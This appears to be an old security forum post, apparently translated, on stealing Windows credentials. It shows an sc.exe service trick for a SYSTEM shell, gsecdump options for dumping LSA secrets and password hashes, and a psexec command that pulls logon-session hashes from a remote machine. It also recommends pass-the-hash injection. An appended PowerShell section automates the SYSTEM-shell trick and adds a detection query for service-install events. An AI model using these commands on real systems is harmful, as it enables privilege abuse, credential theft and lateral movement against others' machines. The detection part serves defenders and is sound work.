To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to inject the hashes just grabbed with gsecdump into the local lsass process and carry out a hash injection attack. The foreigners really are good at this; administrators are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, really do not need to be cracked at all; it is purely a matter of using the tools. As the original article puts it well: whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing; what a gap.
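The sc.exe sequence above, wrapped as an added PowerShell example that is not code from the post or from the truesecurity.se article. It treats the 1053 timeout as the expected outcome (cmd.exe never registers with the Service Control Manager, so the SCM gives up while the second cmd.exe spawned by "start" keeps running on the interactive desktop), always deletes the service afterwards, and adds the defender's check: every CreateService is recorded as event 7045 in the System log, so a service whose binary is cmd.exe is easy to find. Assumptions: an elevated prompt (creating a service needs administrator rights, so this is admin to SYSTEM, not an unprivileged escalation), sc.exe on the PATH, and the service name 'shellcmdline' reused from the transcript as an illustrative default. The trick as written is specific to XP/2003-era systems: from Vista on, session 0 isolation puts an interactive service's window in session 0 rather than on the logged-on user's desktop, and Windows 8 and later refuse to start interactive services by default (the NoInteractiveServices setting); the 7045 audit trail is the same on all versions.

```powershell
# Added example (not code from the post or from the truesecurity.se article).
# Assumes an elevated prompt on an XP/2003-era system where interactive
# services still work, sc.exe on the PATH, and the illustrative service
# name 'shellcmdline' taken from the transcript as a default.

function Invoke-InteractiveServiceShell {
    param(
        [string]$ServiceName = 'shellcmdline',
        [string]$BinPath = 'C:\WINDOWS\system32\cmd.exe /K start'
    )

    # Call sc.exe explicitly: in PowerShell the bare word 'sc' is an alias
    # for Set-Content, not the Service Control tool.
    & sc.exe create $ServiceName binpath= $BinPath type= own type= interact | Out-Null
    if ($LASTEXITCODE -ne 0) {
        throw "CreateService failed, sc.exe exit code $LASTEXITCODE"
    }

    try {
        $out = (& sc.exe start $ServiceName 2>&1) | Out-String
        # Error 1053 (ERROR_SERVICE_REQUEST_TIMEOUT) is the expected result:
        # cmd.exe never calls StartServiceCtrlDispatcher, so the SCM gives up
        # after its timeout. By then 'start' has already spawned the second
        # cmd.exe, which is what appears on the interactive desktop.
        if ($out -match '\b1053\b') {
            Write-Host 'sc start timed out as expected; look for the new cmd.exe window.'
            return $true
        }
        Write-Host "Unexpected sc start result:`n$out"
        return $false
    }
    finally {
        # Always remove the service: a leftover entry that launches cmd.exe
        # as SYSTEM is a persistence mechanism in its own right.
        & sc.exe delete $ServiceName | Out-Null
    }
}

function Find-ServiceInstallsRunningCmd {
    param([int]$Newest = 500)
    # Defender's side of the same trick. The Service Control Manager logs
    # every CreateService as event 7045 in the System log, and the message
    # carries the service file name, so a service whose binary is cmd.exe
    # stands out. Get-EventLog reads the classic log, so this also works on
    # the XP/2003-era systems the post targets (PowerShell 2.0 and later).
    Get-EventLog -LogName System -Source 'Service Control Manager' -Newest $Newest |
        Where-Object { $_.EventID -eq 7045 -and $_.Message -match '(?i)cmd\.exe' } |
        Select-Object TimeGenerated, MachineName,
            @{ Name = 'Detail'; Expression = { ($_.Message -replace '\s+', ' ').Trim() } }
}

# Usage (elevated):
#   Invoke-InteractiveServiceShell
#   Find-ServiceInstallsRunningCmd | Format-List
```

The detection function matches on the service file name only; any service installed with cmd.exe (or "cmd.exe /K start") as its binary is reported, whether or not it was marked interactive, which is the right bias since a legitimate service is never a bare shell.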